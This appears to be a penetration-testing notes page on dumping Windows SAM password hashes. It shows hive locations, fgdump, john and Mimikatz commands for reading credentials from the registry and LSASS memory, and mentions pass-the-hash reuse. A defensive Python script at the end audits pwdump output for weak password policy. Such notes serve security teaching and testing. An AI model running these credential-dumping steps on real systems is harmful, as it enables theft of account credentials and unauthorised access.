
Dumping the sam file

Windows stores local account password hashes in the Security Account Manager (SAM) registry hive.

The hashes in the SAM are encrypted with the boot key (SYSKEY), which is stored in the SYSTEM hive, so both files are needed to recover them.

If you can read the SAM and SYSTEM files, you can extract the hashes. A very common way of capturing hashed passwords on older Windows systems is to dump the SAM file. The Security Account Manager is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores user password hashes; it is used to authenticate local and remote users on the system.

SAM/SYSTEM Locations

C:\Windows\System32\config
# Live SAM and SYSTEM hives, locked while Windows is running

C:\Windows\Repair
C:\Windows\System32\config\RegBack
# Backup copies of the hives can be found here

Extracting Password hashes from SAM file

The SAM file cannot be read directly while Windows is running because it is locked by the operating system. However, several tools can extract the password hashes from memory or the registry, such as pwdump and fgdump; if you have a Meterpreter session on the system (or set one up), you can also use the hashdump post-exploitation module.

fgdump.exe

/usr/share/windows/windows-binaries/fgdump/fgdump.exe

Transfer it to the target and run it; a file named '127.0.0.1.pwdump' containing the hashes will be created in the same directory.

Cracking hashes with john

john --wordlist=/usr/share/john/password.lst /root/Desktop/hashes.txt

Mimikatz (Need Admin Access)

Executing mimikatz

mimikatz.exe -m

Extracting password with sekurlsa

To interact with LSASS and capture credentials from memory, Mimikatz needs:

  • An administrator account to get debug privileges via privilege::debug, or

  • A SYSTEM account via post exploitation/privilege escalation. In this case the debug privilege is not necessary.

$ privilege::debug

Privilege ‘20’ OK

When the user account that is running Mimikatz does not have administrative privileges and is therefore unable to access the LSASS service, Mimikatz will throw the following error:

Error: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Note: If you run the debug command from a shell running as NT AUTHORITY\SYSTEM, Mimikatz will also throw an error, but it will not prevent you from accessing LSASS to dump credentials:

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000022

lsadump::sam

sekurlsa::logonpasswords

These dumped hashes can then be used with pth-winexe (pass-the-hash) to gain access.
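Before cracking, a dump in the pwdump format written by fgdump above (user:RID:LM hash:NT hash:::) can be audited for the policy problems a defender cares about: LM hashes still being stored, empty passwords, and the same password reused across local accounts. This is an added example, not part of the original notes; the sample dump lines are constructed (the hash values are made up), and EMPTY_LM / EMPTY_NT are the well-known hashes of an empty password.

```python
import re
from collections import defaultdict

# Well-known hashes of an empty password (public constants, not secrets)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is disabled or the password is blank
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# pwdump format, one account per line: user:RID:LMhash:NThash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_pwdump(text):
    """Return a list of {user, rid, lm, nt} dicts; blank or malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Flag stored LM hashes, empty passwords, and NT hashes shared by several accounts."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty password"))
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(users), "same password on multiple accounts"))
    return findings


# Constructed sample dump: hash values are invented except the empty-password constants
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacyuser:1002:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
not a pwdump line
"""

if __name__ == "__main__":
    for user, issue in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{user}: {issue}")
```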


Last updated 3 years ago